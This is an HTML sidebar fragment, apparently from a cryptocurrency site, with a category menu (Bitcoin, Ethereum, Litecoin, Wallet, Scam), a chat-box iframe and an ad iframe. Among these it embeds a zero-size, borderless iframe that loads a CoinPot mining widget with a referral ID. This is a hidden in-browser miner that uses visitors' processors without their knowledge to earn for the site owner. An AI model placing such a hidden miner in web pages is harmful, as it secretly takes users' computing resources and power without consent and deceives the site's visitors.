<div class="navbar-default sidebar" role="navigation">
    <div class="sidebar-nav navbar-collapse">
        <ul class="nav in" id="side-menu">        
		<li><a href="#" ng-click="cat('')">All (全部)</a></li>
		<li><a href="#" ng-click="cat('Bitcoin')">Bitcoin (比特幣)</a></li>
		<li><a href="#" ng-click="cat('Ethereum')">Ethereum (以太幣)</a></li>
		<li><a href="#" ng-click="cat('Litecoin')">Litecoin (萊特幣)</a></li>
		<!--li><a href="#" ng-click="cat('XMR')">XMR(門羅幣)</a></li-->
		<li><a href="#" ng-click="cat('Wallet')">Wallet (錢包)</a></li> 
		<li><a href="#" ng-click="cat('Scam')">SCAM (詐騙)</a></li> 		
        </ul>
		<iframe src="//www7.cbox.ws/box/?boxid=851224&boxtag=xBkA9Y" width="100%" height="180" allowtransparency="yes" frameborder="0" marginheight="0" marginwidth="0" scrolling="auto"></iframe>
    </div>	
    <!-- /.sidebar-collapse -->	
	<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/bitcoincore/?ref=18E54EF3CCFB&mode=widget" style="overflow:hidden;width:0;height:0;border:0; border:none;"></iframe>
	
	<iframe data-aa='777621' src='//acceptable.a-ads.com/777621' width="100%" scrolling='no' style='border:0px; padding:0;overflow:hidden' allowtransparency='true'></iframe>
	
	
	
</div> 
 

